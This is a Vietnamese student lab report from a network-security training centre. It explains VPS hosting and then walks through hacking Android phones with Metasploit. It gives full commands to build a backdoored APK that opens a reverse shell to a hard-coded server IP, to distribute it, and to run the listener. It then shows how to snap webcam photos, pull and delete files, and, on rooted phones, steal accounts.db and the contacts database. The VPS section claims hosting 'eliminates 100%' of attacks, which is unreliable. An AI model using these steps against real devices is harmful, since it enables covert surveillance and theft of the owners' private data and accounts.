1. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
1
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 4
Hack android dùng metasploit cài trên VPS
CBHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt
2. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
2
Mục lục
1. VPS là gì?..................................................................................................................................3
2. Các tính năng và lợi ích của VPS...............................................................................................3
3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4
3. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
3
1. VPS là gì?
Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đầu. Trong khi trên 1
server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy
VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lần.
Khác với hosting sử dụng phần mềm quản lý (hosting control panel) để khởi tạo và quản lý các
gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lần so với
số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu suất sử dụng
tài nguyên của VPS luôn vượt trội so với hosting.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn
công.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,
nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng
server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác trên server
đều không bị ảnh hưởng.
2. Các tính năng và lợi ích của VPS
Toàn quyền quản lý với tính năng như một máy chủ độc lập.
Độ ổn định và bảo mật cao.
Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ.
Quản trị từ xa, cài đặt các phần mềm và ứng dụng theo nhu cầu
Kết nối Internet với 01 IP tĩnh.
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng Ram
riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể
cài đặt để thực hiện những nhu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không
phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút
4. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
4
3. Hack android sử dụng metaspoit cài trên VPS
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file
vừa tạo.
Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng.
Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
5. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
5
Ta vào máy VPS và mở Metasploit Console lên
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor
6. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
6
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
7. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
7
Ta dùng lệnh sysinfo để xem thông tin máy android
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
8. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
8
Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Ta vào thư mục /sdcard/Download để down file về
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
9. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
9
Muốn xóa một file ta dùng lệnh rm <tên file>
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lênh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
10. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
10
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
11. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
11
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Tiếp tục ta vào địa chỉ
/data/data/com.android.providers.contacts/databases
để copy file contacts2.db về Sdcard
12. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
12
Sau đó ta download file contacts2.db về máy VPS
Bên dưới là danh sách danh bạ ta down từ máy android đã được root. Ta mở file *.db bằng phần
mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta
Hết
